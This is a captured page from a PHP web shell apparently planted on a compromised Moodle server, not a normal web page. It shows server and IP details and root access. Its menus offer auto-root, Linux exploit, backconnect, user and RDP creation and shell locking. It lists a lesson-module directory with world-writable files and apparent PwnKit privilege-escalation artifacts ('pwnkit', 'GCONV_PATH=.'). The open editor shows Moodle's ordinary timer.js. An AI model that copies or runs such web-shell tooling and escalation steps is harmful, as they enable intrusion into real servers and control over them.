Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.1
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
mod /
lesson /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
backup
[ DIR ]
drwxrwxrwx
classes
[ DIR ]
drwxrwxrwx
db
[ DIR ]
drwxrwxrwx
lang
[ DIR ]
drwxrwxrwx
pagetypes
[ DIR ]
drwxrwxrwx
pix
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
continue.php
5.14
KB
-rwxrwxrwx
edit.php
2.85
KB
-rwxrwxrwx
editpage.php
7.29
KB
-rwxrwxrwx
editpage_form.php
1.95
KB
-rwxrwxrwx
essay.php
21.5
KB
-rwxrwxrwx
essay_form.php
2.36
KB
-rwxrwxrwx
format.php
32.26
KB
-rwxrwxrwx
grade.php
1.6
KB
-rwxrwxrwx
import.php
3.71
KB
-rwxrwxrwx
import_form.php
3.14
KB
-rwxrwxrwx
index.php
4.16
KB
-rwxrwxrwx
lesson.php
5.69
KB
-rwxrwxrwx
lib.php
61.52
KB
-rwxrwxrwx
locallib.php
206.51
KB
-rwxrwxrwx
mediafile.php
3.78
KB
-rwxrwxrwx
mod_form.php
21.59
KB
-rwxrwxrwx
override_form.php
12
KB
-rwxrwxrwx
overridedelete.php
3.56
KB
-rwxrwxrwx
overrideedit.php
7.68
KB
-rwxrwxrwx
overrides.php
11.74
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
renderer.php
26.1
KB
-rwxrwxrwx
report.php
16.83
KB
-rwxrwxrwx
settings.php
8.69
KB
-rwxrwxrwx
tabs.php
3.56
KB
-rwxrwxrwx
timer.js
2.82
KB
-rwxrwxrwx
upgrade.txt
2.3
KB
-rwxrwxrwx
version.php
1.17
KB
-rwxrwxrwx
view.php
10.59
KB
-rwxrwxrwx
view_form.php
1.95
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : timer.js
/*///////////////////////////////////////////////////////// // This code is based off of // "Live Clock Lite" script - Version 1.0 // By Mark Plachetta (astroboy@zip.com.au) // // The original script displayed a clock. // Mark Nielsen modified it to be a countdown timer // for the lesson module in moodle. // // Below is the code that is used to call this page. // echo "<script type=\"text/javascript\">\n"; // echo "var starttime = ". $timer->starttime . ";\n"; // echo "var servertime = ". time() . ";\n"; // echo "var testlength = ". $lesson->timelimit .";\n"; // echo "document.write('<script type=\"text/javascript\" src=\"liveclock_lite.js\"><\/script>');\n"; // echo "window.onload = function () { show_clock(); }"; // echo "</script>\n"; // //////////////////////////////////////////////////////////*/ var stopclock = 0; var myclock = ''; var timeleft, hours, minutes, secs; var javatimeDate = new Date(); var javatime = javatimeDate.getTime(); javatime = Math.floor(javatime / 1000); if (typeof(clocksettings) != 'undefined') { if (clocksettings.starttime) { starttime = parseInt(clocksettings.starttime); } if (clocksettings.servertime) { servertime = parseInt(clocksettings.servertime); } if (clocksettings.testlength) { testlength = parseInt(clocksettings.testlength); } } difference = javatime - servertime; starttime = starttime + difference; /*function leave() { // feable attempt to run a script when someone leaves a timed test early, failed so far window.onunload = window.open('http://www.google.com','','toolbar=no,menubar=no,location=no,height=500,width=500'); } leave();*/ function show_clock() { currentDate = new Date(); current = currentDate.getTime(); current = Math.floor(current / 1000); var mytime = '', myclock = document.getElementById("lesson-timer"); if (current > starttime + testlength) { mytime += M.util.get_string('timeisup', 'lesson'); stopclock = 1; } else { timeleft = starttime + testlength - current; if (timeleft < 60) { myclock.className = "timeleft1"; } hours = Math.floor(timeleft / 3600); timeleft = timeleft - (hours * 3600); minutes = Math.floor(timeleft / 60); secs = timeleft - (minutes * 60); if (secs < 10) { secs = "0" + secs; } if (minutes < 10) { minutes = "0" + minutes; } mytime += hours + ":" + minutes + ":" + secs; } myclock.innerHTML = mytime; if (stopclock == 0) { setTimeout("show_clock()", 1000); } }
Close